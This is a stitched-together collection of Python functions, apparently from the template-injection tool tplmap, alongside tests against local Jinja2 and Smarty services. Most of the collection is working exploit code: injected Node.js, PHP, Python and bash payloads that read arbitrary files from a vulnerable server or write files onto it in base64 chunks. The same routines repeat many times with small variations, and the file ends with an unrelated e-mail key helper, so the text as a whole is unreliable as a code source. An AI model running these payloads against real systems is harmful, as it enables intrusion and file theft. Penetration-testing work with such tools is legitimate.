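def test_upload_blind(self):
    """Check blind-mode upload against files read back from the local disk.

    Detection results are compared with ``self.expected_data_blind`` first.
    The upload checks run only when ``EXTRA_UPLOAD_BLIND`` is truthy. Because
    the blind channel returns no output, every upload is verified by reading
    the written file from local disk and comparing md5 digests.
    """

    def read_bytes(path):
        # Close the handle deterministically instead of relying on GC.
        with open(path, 'rb') as handle:
            return handle.read()

    obj, data = self._get_detection_obj_data(self.url_blind % '', technique='T')
    self.assertEqual(data, self.expected_data_blind)

    if not EXTRA_UPLOAD_BLIND:
        return

    # Without --force-overwrite a blind write must be refused, so no file
    # may appear on disk.
    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
    obj.write('AAAA', remote_temp_path)
    self.assertFalse(os.path.exists(remote_temp_path))

    # Now set --force-overwrite and retry
    obj.channel.args['force_overwrite'] = True

    # Send long binary
    data = read_bytes('/bin/ls')
    obj.write(data, remote_temp_path)

    # Since it's blind, read md5 from disk
    checkdata = read_bytes(remote_temp_path)
    self.assertEqual(strings.md5(checkdata), strings.md5(data))
    os.unlink(remote_temp_path)

    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)

    # Send short ASCII data
    data = 'SHORT ASCII DATA'
    obj.write(data, remote_temp_path)

    checkdata = read_bytes(remote_temp_path)
    self.assertEqual(strings.md5(checkdata), strings.md5(data))
    os.unlink(remote_temp_path)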
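def test_upload_blind(self):
    """Check blind-mode upload against files read back from the local disk.

    Detection results are compared with ``self.expected_data_blind`` first.
    Because the blind channel returns no output, every upload is verified by
    reading the written file from local disk and comparing md5 digests.
    """

    def read_bytes(path):
        # Close the handle deterministically instead of relying on GC.
        with open(path, 'rb') as handle:
            return handle.read()

    obj, data = self._get_detection_obj_data(self.url_blind % '')
    self.assertEqual(data, self.expected_data_blind)

    # Without --force-overwrite a blind write must be refused, so no file
    # may appear on disk.
    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
    obj.write('AAAA', remote_temp_path)
    self.assertFalse(os.path.exists(remote_temp_path))

    # Now set --force-overwrite and retry
    obj.channel.args['force_overwrite'] = True

    # Send long binary
    data = read_bytes('/bin/ls')
    obj.write(data, remote_temp_path)

    # Since it's blind, read md5 from disk
    checkdata = read_bytes(remote_temp_path)
    self.assertEqual(strings.md5(checkdata), strings.md5(data))
    os.unlink(remote_temp_path)

    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)

    # Send short ASCII data
    data = 'SHORT ASCII DATA'
    obj.write(data, remote_temp_path)

    checkdata = read_bytes(remote_temp_path)
    self.assertEqual(strings.md5(checkdata), strings.md5(data))
    os.unlink(remote_temp_path)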
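def test_upload(self):
    """Check upload, the overwrite guard and forced overwrite.

    Detection results are compared with ``self.expected_data`` first. The
    upload checks run only when ``EXTRA_UPLOAD`` is truthy. Each step is
    verified by comparing ``obj.md5`` of the written path with the local md5
    of the data that was sent.
    """
    obj, data = self._get_detection_obj_data(self.url % '')
    self.assertEqual(data, self.expected_data)

    if not EXTRA_UPLOAD:
        return

    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)

    # Send long binary; the context manager closes the local handle.
    with open('/bin/ls', 'rb') as handle:
        data = handle.read()
    obj.write(data, remote_temp_path)
    self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
    obj.execute('rm %s' % (remote_temp_path))

    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)

    # Send short ASCII data, without removing it
    data = 'SHORT ASCII DATA'
    obj.write(data, remote_temp_path)
    self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))

    # A second write without --force-overwrite must leave the file as it
    # was, so the md5 still matches the previous data.
    obj.write('APPENDED DATA', remote_temp_path)
    self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))

    # Now set --force-overwrite and rewrite new data on the same file
    obj.channel.args['force_overwrite'] = True
    data = 'NEW DATA'
    obj.write(data, remote_temp_path)
    self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
    obj.execute('rm %s' % (remote_temp_path))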
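def test_upload(self):
    """Check upload and the overwrite guard on the local Jinja2 test service.

    The channel points at the loopback endpoint on port 15001. After
    detection, the ``os`` entry is dropped from ``channel.data`` before the
    comparison with ``self.expected_data``. Each upload is verified by
    comparing ``_md5`` of the written path with the local md5 of the data.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15001/reflect/jinja2?inj=*'
    })
    jinja2obj = Jinja2(channel)
    jinja2obj.detect()
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)

    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)

    # Send long binary; the context manager closes the local handle.
    with open('/bin/ls', 'rb') as handle:
        data = handle.read()
    jinja2obj.write(data, remote_temp_path)
    self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))
    jinja2obj.execute('rm %s' % (remote_temp_path))

    # Send short ASCII data, without removing it
    data = 'SHORT ASCII DATA'
    jinja2obj.write(data, remote_temp_path)
    self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))

    # A second write without --force-overwrite must leave the file as it
    # was, so the md5 still matches the previous data.
    jinja2obj.write('APPENDED DATA', remote_temp_path)
    self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))

    # Now set --force-overwrite and rewrite new data on the same file
    jinja2obj.channel.args['force_overwrite'] = True
    data = 'NEW DATA'
    jinja2obj.write(data, remote_temp_path)
    self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))
    jinja2obj.execute('rm %s' % (remote_temp_path))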
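def test_upload(self):
    """Check upload and the overwrite guard on the local Smarty test service.

    The channel points at the loopback endpoint on port 15002. After
    detection, the ``os`` entry is dropped from ``channel.data`` before the
    comparison with ``self.expected_data``. Each upload is verified by
    comparing ``_md5`` of the written path with the local md5 of the data.
    """
    channel = Channel({
        'url': 'http://127.0.0.1:15002/smarty-3.1.29-unsecured.php?inj=*'
    })
    smartyobj = Smarty(channel)
    smartyobj.detect()
    del channel.data['os']
    self.assertEqual(channel.data, self.expected_data)

    remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)

    # Send long binary; the context manager closes the local handle.
    with open('/bin/ls', 'rb') as handle:
        data = handle.read()
    smartyobj.write(data, remote_temp_path)
    self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))
    smartyobj.execute('rm %s' % (remote_temp_path))

    # Send short ASCII data, without removing it
    data = 'SHORT ASCII DATA'
    smartyobj.write(data, remote_temp_path)
    self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))

    # A second write without --force-overwrite must leave the file as it
    # was, so the md5 still matches the previous data.
    smartyobj.write('APPENDED DATA', remote_temp_path)
    self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))

    # Now set --force-overwrite and rewrite new data on the same file
    smartyobj.channel.args['force_overwrite'] = True
    data = 'NEW DATA'
    smartyobj.write(data, remote_temp_path)
    self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))
    smartyobj.execute('rm %s' % (remote_temp_path))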
def read(self, remote_path):
    """Download ``remote_path`` using the plugin's configured 'read' action.

    The action dict supplies the payload template (key ``read``) and the name
    of the method to invoke (key ``call``, default ``render``). Returns
    ``None`` when the action is incomplete, the named method is absent, or
    the remote md5 cannot be obtained. Otherwise returns the decoded bytes;
    an md5 mismatch is only logged, the data is still returned.
    """
    read_action = self.actions.get('read', {})
    template = read_action.get('read')
    method_name = read_action.get('call', 'render')

    # Nothing to do unless the action, its payload and a callable name
    # that exists on this object are all present.
    configured = (
        read_action and template and method_name
        and hasattr(self, method_name)
    )
    if not configured:
        return

    # The remote digest is fetched first and used as the reference value.
    expected_digest = self.md5(remote_path)
    if not expected_digest:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    execution_code = template % ({'path': remote_path})
    encoded = getattr(self, method_name)(code=execution_code)
    data = base64.b64decode(encoded)

    # md5 serves as a transfer checksum here, not as a security control.
    if md5(data) == expected_digest:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def read(self, remote_path):
    """Download ``remote_path`` using the plugin's configured 'read' action.

    Reads the payload template (``read``) and the method name (``call``,
    default ``render``) from ``self.actions['read']``. Returns ``None`` if
    any of them is missing, if the method does not exist on this object, or
    if no remote md5 is returned. Otherwise the base64 response is decoded
    and returned, with the md5 comparison result written to the log.
    """
    spec = self.actions.get('read', {})
    payload_template = spec.get('read')
    call_name = spec.get('call', 'render')

    # Guard clauses: each missing piece ends the call with None.
    if not spec:
        return
    if not payload_template:
        return
    if not call_name:
        return
    if not hasattr(self, call_name):
        return

    # Reference digest as reported for the remote file.
    remote_digest = self.md5(remote_path)
    if not remote_digest:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    code_to_run = payload_template % ({'path': remote_path})
    handler = getattr(self, call_name)
    data = base64.b64decode(handler(code=code_to_run))

    # A mismatch is reported but does not stop the data being returned.
    digests_match = md5(data) == remote_digest
    if digests_match:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.inject``.

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks, one ``inject``
    call per chunk, each carrying a URL-safe base64 blob. The final md5
    comparison is only logged; nothing is returned.
    """
    truncate_code = """- global.process.mainModule.require('fs').writeFileSync('%s', '')"""
    append_code = """- global.process.mainModule.require('fs').appendFileSync('%s', Buffer('%s', 'base64'), 'binary')"""

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.inject(truncate_code % remote_path)
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One injected append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64.urlsafe_b64encode(piece)
        self.inject(append_code % (remote_path, encoded_piece))

    # NOTE(review): success is reported at warning level, same as failure.
    if md5(data) == self._md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.evaluate`` (PHP).

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks, one ``evaluate``
    call per chunk, each carrying a URL-safe base64 blob that the snippet
    maps back to the standard alphabet before decoding. The final md5
    comparison is only logged; nothing is returned.
    """
    truncate_code = """file_put_contents("%s", "");"""
    append_code = """$d="%s"; file_put_contents("%s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);"""

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.evaluate(truncate_code % (remote_path))
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One evaluated append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64.urlsafe_b64encode(piece)
        self.evaluate(append_code % (encoded_piece, remote_path))

    # NOTE(review): success is reported at warning level, same as failure.
    if md5(data) == self._md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` using the configured 'write' action.

    The action dict supplies the ``write`` and ``truncate`` payload templates
    and the method name to invoke (``call``, default ``inject``). Returns
    ``None`` immediately when any of these is missing or the method does not
    exist. In blind mode, or when the remote file already has an md5, the
    upload requires the ``force_overwrite`` channel argument and truncates
    the target first. Data is sent in 500-character chunks as URL-safe
    base64, one call per chunk. Blind uploads cannot be verified; otherwise
    the md5 comparison result is logged.
    """
    spec = self.actions.get('write', {})
    write_template = spec.get('write')
    truncate_template = spec.get('truncate')
    call_name = spec.get('call', 'inject')

    # Skip unless the action is fully described and callable on this object.
    usable = (
        spec and write_template and truncate_template and call_name
        and hasattr(self, call_name)
    )
    if not usable:
        return

    # Blind mode cannot tell whether the file exists, so it is treated the
    # same as an existing file: --force-overwrite is required.
    if self.get('blind') or self.md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            execution_code = truncate_template % ({'path': remote_path})
            getattr(self, call_name)(code=execution_code)
        else:
            if self.get('blind'):
                log.warn('Blind upload might overwrite files, run with --force-overwrite to continue')
            else:
                log.warn('Remote file already exists, run with --force-overwrite to overwrite')
            return

    # One call per 500-character chunk; the raw chunk is written to the
    # debug log before encoding.
    for piece in chunkit(data, 500):
        log.debug('[b64 encoding] %s' % piece)
        encoded_piece = base64.urlsafe_b64encode(piece)
        execution_code = write_template % ({
            'path': remote_path,
            'chunk_b64': encoded_piece,
        })
        getattr(self, call_name)(code=execution_code)

    # NOTE(review): every outcome, including success, is logged as a warning.
    if self.get('blind'):
        log.warn('Blind upload can\'t check the upload correctness, check manually')
    elif md5(data) == self.md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def read(self, remote_path):
    """Download ``remote_path`` through ``self.evaluate`` (PHP snippet).

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file comes back base64-encoded, is decoded locally
    and its md5 is compared with the remote one. A mismatch is only logged;
    the decoded data is returned either way.
    """
    expected_digest = self._md5(remote_path)
    if not expected_digest:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # remote_path is placed verbatim between double quotes in the snippet.
    snippet = """print(base64_encode(file_get_contents("%s")));""" % remote_path
    encoded = self.evaluate(snippet)
    data = base64decode(encoded)

    # md5 serves as a transfer checksum here, not as a security control.
    if md5(data) == expected_digest:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def read(self, remote_path):
    """Download ``remote_path`` through ``self.evaluate`` (Python snippet).

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file comes back base64-encoded, is decoded with
    ``base64.b64decode`` and its md5 is compared with the remote one. A
    mismatch is only logged; the decoded data is returned either way.
    """
    expected_digest = self._md5(remote_path)
    if not expected_digest:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # remote_path is placed verbatim between double quotes in the snippet.
    snippet = """__import__("base64").b64encode(open("%s", "rb").read())""" % remote_path
    encoded = self.evaluate(snippet)
    data = base64.b64decode(encoded)

    # md5 serves as a transfer checksum here, not as a security control.
    if md5(data) == expected_digest:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def read(self, remote_path):
    """Download ``remote_path`` through ``self.evaluate`` (Python snippet).

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file comes back base64-encoded, is decoded with the
    ``base64decode`` helper and its md5 is compared with the remote one. A
    mismatch is only logged; the decoded data is returned either way.
    """
    reference_md5 = self._md5(remote_path)
    if not reference_md5:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # remote_path is placed verbatim between double quotes in the snippet.
    fetch_code = """__import__("base64").b64encode(open("%s", "rb").read())""" % remote_path
    data = base64decode(self.evaluate(fetch_code))

    intact = md5(data) == reference_md5
    if intact:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` using the configured 'write' action.

    ``self.actions['write']`` provides the ``write`` and ``truncate`` payload
    templates and the method name (``call``, default ``inject``). The call is
    a no-op returning ``None`` if any piece is missing or the method is not
    present. In blind mode, or when an md5 is returned for the target, the
    ``force_overwrite`` channel argument is required and the target is
    truncated first. Data is sent as URL-safe base64 in 500-character
    chunks, one call per chunk. Only the log records the outcome.
    """
    action = self.actions.get('write', {})
    tpl_write = action.get('write')
    tpl_truncate = action.get('truncate')
    method_name = action.get('call', 'inject')

    # Guard clauses: each missing piece ends the call with None.
    if not action:
        return
    if not tpl_write:
        return
    if not tpl_truncate:
        return
    if not method_name:
        return
    if not hasattr(self, method_name):
        return

    # Blind mode is handled like an existing file because existence cannot
    # be checked: --force-overwrite is required.
    if self.get('blind') or self.md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            truncate_code = tpl_truncate % ({'path': remote_path})
            getattr(self, method_name)(code=truncate_code)
        else:
            if self.get('blind'):
                log.warn('Blind upload might overwrite files, run with --force-overwrite to continue')
            else:
                log.warn('Remote file already exists, run with --force-overwrite to overwrite')
            return

    # One call per 500-character chunk; the raw chunk goes to the debug log.
    for block in chunkit(data, 500):
        log.debug('[b64 encoding] %s' % block)
        block_b64 = base64.urlsafe_b64encode(block)
        write_code = tpl_write % ({'path': remote_path, 'chunk_b64': block_b64})
        getattr(self, method_name)(code=write_code)

    # NOTE(review): every outcome, including success, is logged as a warning.
    if self.get('blind'):
        log.warn('Blind upload can\'t check the upload correctness, check manually')
    elif md5(data) == self.md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.evaluate`` (Python).

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks encoded by the
    ``base64encode`` helper, one ``evaluate`` call per chunk. The final md5
    comparison is only logged; nothing is returned.
    """
    truncate_code = """open("%s", 'w').close()"""
    append_code = """open("%s", 'ab+').write(__import__("base64").b64decode('%s'))"""

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.evaluate(truncate_code % remote_path)
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One evaluated append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64encode(piece)
        self.evaluate(append_code % (remote_path, encoded_piece))

    # NOTE(review): success is reported at warning level, same as failure.
    if md5(data) == self._md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.evaluate`` (PHP).

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks encoded by the
    ``base64encode`` helper, one ``evaluate`` call per chunk. The final md5
    comparison is only logged; nothing is returned.
    """
    truncate_code = """file_put_contents("%s", "");"""
    append_code = """file_put_contents("%s", base64_decode("%s"), FILE_APPEND);"""

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.evaluate(truncate_code % (remote_path))
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One evaluated append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64encode(piece)
        self.evaluate(append_code % (remote_path, encoded_piece))

    # NOTE(review): success is reported at warning level, same as failure.
    if md5(data) == self._md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def read(self, remote_path):
    """Download ``remote_path`` through ``self.execute`` (shell command).

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file is base64-encoded on the remote side, decoded
    locally and its md5 is compared with the remote one. A mismatch is only
    logged; the decoded data is returned either way.
    """
    expected_digest = self._md5(remote_path)
    if not expected_digest:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # base64 transport is used because self.execute() goes through
    # self.inject(), which strips the response and would corrupt raw data.
    command = 'bash -c base64<%s' % remote_path
    encoded = self.execute(command)
    data = base64decode(encoded)

    # md5 serves as a transfer checksum here, not as a security control.
    if md5(data) == expected_digest:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.execute`` (shell).

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks encoded by the
    ``base64encode`` helper, one ``execute`` call per chunk. The final md5
    comparison is only logged; nothing is returned.
    """
    truncate_cmd = "bash -c {echo,-n,}>%s"
    append_cmd = "bash -c {base64,--decode}<<<%s>>%s"

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.execute(truncate_cmd % (remote_path))
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One executed append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64encode(piece)
        self.execute(append_cmd % (encoded_piece, remote_path))

    # NOTE(review): success is reported at warning level, same as failure.
    if md5(data) == self._md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.inject``.

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks encoded by the
    ``base64encode`` helper, one ``inject`` call per chunk. The final md5
    comparison is only logged; nothing is returned.
    """
    truncate_code = """- global.process.mainModule.require('fs').writeFileSync('%s', '')"""
    append_code = """- global.process.mainModule.require('fs').appendFileSync('%s', Buffer.from('%s', 'base64'), 'binary')"""

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.inject(truncate_code % remote_path)
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One injected append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64encode(piece)
        self.inject(append_code % (remote_path, encoded_piece))

    # NOTE(review): success is reported at warning level, same as failure.
    if md5(data) == self._md5(remote_path):
        log.warn('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.evaluate`` (Python).

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks as URL-safe
    base64, one ``evaluate`` call per chunk. The final md5 comparison is
    only logged (info on match, warning on mismatch); nothing is returned.
    """
    truncate_code = """open("%s", 'w').close()"""
    append_code = """open("%s", 'ab+').write(__import__("base64").urlsafe_b64decode('%s'))"""

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.evaluate(truncate_code % remote_path)
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One evaluated append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64.urlsafe_b64encode(piece)
        self.evaluate(append_code % (remote_path, encoded_piece))

    if md5(data) == self._md5(remote_path):
        log.info('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def read(self, remote_path):
    """Download ``remote_path`` through ``self.evaluate`` (PHP snippet).

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file comes back base64-encoded, is decoded with
    ``base64.b64decode`` and its md5 is compared with the remote one. A
    mismatch is only logged; the decoded data is returned either way.
    """
    reference_md5 = self._md5(remote_path)
    if not reference_md5:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # remote_path is placed verbatim between double quotes in the snippet.
    fetch_code = """print(base64_encode(file_get_contents("%s")));""" % remote_path
    data = base64.b64decode(self.evaluate(fetch_code))

    intact = md5(data) == reference_md5
    if intact:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def read(self, remote_path):
    """Download ``remote_path`` through ``self.inject``.

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file is base64-encoded on the remote side, decoded
    with the ``base64decode`` helper and its md5 is compared with the remote
    one. A mismatch is only logged; the decoded data is returned either way.
    """
    expected_digest = self._md5(remote_path)
    if not expected_digest:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # base64 transport is used because the response is stripped on the way
    # back, which would corrupt raw file data.
    snippet = """= global.process.mainModule.require('fs').readFileSync('%s').toString('base64')""" % remote_path
    encoded = self.inject(snippet)
    data = base64decode(encoded)

    # md5 serves as a transfer checksum here, not as a security control.
    if md5(data) == expected_digest:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def read(self, remote_path):
    """Download ``remote_path`` through ``self.execute`` (shell command).

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file is base64-encoded on the remote side, decoded
    with ``base64.b64decode`` and its md5 is compared with the remote one. A
    mismatch is only logged; the decoded data is returned either way.
    """
    reference_md5 = self._md5(remote_path)
    if not reference_md5:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # base64 transport is used because self.execute() goes through
    # self.inject(), which strips the response and would corrupt raw data.
    fetch_cmd = 'bash -c base64<%s' % remote_path
    data = base64.b64decode(self.execute(fetch_cmd))

    intact = md5(data) == reference_md5
    if intact:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def write(self, data, remote_path):
    """Upload ``data`` to ``remote_path`` through ``self.execute`` (shell).

    If ``self._md5`` reports an existing file, the upload is refused unless
    the ``force_overwrite`` channel argument is set, in which case the file
    is emptied first. Data is sent in 500-character chunks as URL-safe
    base64, one ``execute`` call per chunk. The final md5 comparison is only
    logged (info on match, warning on mismatch); nothing is returned.
    """
    truncate_cmd = "bash -c {echo,-n,}>%s"
    append_cmd = "bash -c {base64,--decode}<<<{tr,/+,_-}<<<%s>>%s"

    # Existing target: refuse unless --force-overwrite, else empty it.
    if self._md5(remote_path):
        if self.channel.args.get('force_overwrite'):
            self.execute(truncate_cmd % (remote_path))
        else:
            log.warn('Remote path already exists, use --force-overwrite for overwrite')
            return

    # One executed append per 500-character chunk.
    for piece in chunkit(data, 500):
        encoded_piece = base64.urlsafe_b64encode(piece)
        self.execute(append_cmd % (encoded_piece, remote_path))

    if md5(data) == self._md5(remote_path):
        log.info('File uploaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')
def read(self, remote_path):
    """Download ``remote_path`` through ``self.inject``.

    The remote md5 is requested first; a falsy answer logs a warning and
    returns ``None``. The file is base64-encoded on the remote side, decoded
    with ``base64.b64decode`` and its md5 is compared with the remote one. A
    mismatch is only logged; the decoded data is returned either way.
    """
    reference_md5 = self._md5(remote_path)
    if not reference_md5:
        log.warn('Error getting remote file md5, check presence and permission')
        return

    # base64 transport is used because the response is stripped on the way
    # back, which would corrupt raw file data.
    fetch_code = """= global.process.mainModule.require('fs').readFileSync('%s').toString('base64')""" % remote_path
    data = base64.b64decode(self.inject(fetch_code))

    intact = md5(data) == reference_md5
    if intact:
        log.info('File downloaded correctly')
    else:
        log.warn('Remote file md5 mismatch, check manually')

    return data
def gen_verify_code_key(self, email):
    """Return the storage key for an e-mail verification code.

    The key is the fixed prefix ``email_key_`` followed by
    ``strings.md5(email)``.
    """
    # NOTE(review): the address is hashed exactly as passed in; if callers do
    # not normalise case/whitespace, one mailbox can map to several keys.
    # The md5 here only derives a key name and keeps nothing secret: anyone
    # who knows the address can compute the key.
    key_prefix = 'email_key_'
    email_digest = strings.md5(email)
    return key_prefix + email_digest